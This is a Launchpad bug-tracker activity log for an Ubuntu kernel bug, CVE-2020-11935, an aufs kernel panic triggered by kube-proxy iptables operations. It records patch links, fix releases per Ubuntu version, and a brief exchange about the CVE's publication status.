importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Groovy):
status: In Progress → Won't Fix
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu):
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
description: updated
description: updated
description: updated
Changed in linux (Ubuntu Eoan):
status: Won't Fix → In Progress
description: updated
description: updated
description: updated
Mauricio Faria de Oliveira (mfo) wrote :

[X/B/D/E][PATCH 0/2] aufs: fixes for CVE-2020-11935
https://lists.ubuntu.com/archives/kernel-team/2020-June/111578.html

[F/G/Unstable][PATCH 0/1] aufs: fix for CVE-2020-11935
https://lists.ubuntu.com/archives/kernel-team/2020-June/111581.html

Alex Murray (alexmurray) wrote :

This is public in the Ubuntu CVE Tracker so making the bug public too.

information type: Private Security → Public Security
tags: added: patch
Changed in linux (Ubuntu Bionic):
status: In Progress → Fix Released
Changed in linux (Ubuntu Focal):
status: In Progress → Fix Released
Changed in linux (Ubuntu Xenial):
status: New → Fix Released
importance: Undecided → Medium
assignee: nobody → Mauricio Faria de Oliveira (mfo)
Changed in linux (Ubuntu Eoan):
status: In Progress → Fix Committed
Mauricio Faria de Oliveira (mfo) wrote :

Marking as fix released for X/B/F on kernel packages versions:
- Xenial: 4.4.0-186.216
- Bionic: 4.15.0-112.113
- Focal: 5.4.0-42.46

Covered in USNs:
https://usn.ubuntu.com/4425-1
https://usn.ubuntu.com/4426-1
https://usn.ubuntu.com/4427-1

Brian Murray (brian-murray) wrote :

The Eoan Ermine has reached end of life, so this bug will not be fixed for that release

Changed in linux (Ubuntu Eoan):
status: Fix Committed → Won't Fix
Peter Burkholder (peterburkholder) wrote :

This CVE still shows up as "Reserved" at https://nvd.nist.gov/vuln/detail/CVE-2020-11935 and https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11935.

Is there an approval/publication step that y'alls still need to take?

Thanks, Peter

Seth Arnold (seth-arnold) wrote : Re: [Bug 1873074] Re: kernel panic hit by kube-proxy iptables-save/restore caused by aufs

On Wed, Oct 21, 2020 at 10:32:14PM -0000, Peter Burkholder wrote:
> Is there an approval/publication step that y'alls still need to take?

Yes, there is; it's been a busy, uh, three months give or take.

Thanks for the friendly reminder. :)

Changed in linux (Ubuntu):
status: In Progress → Fix Released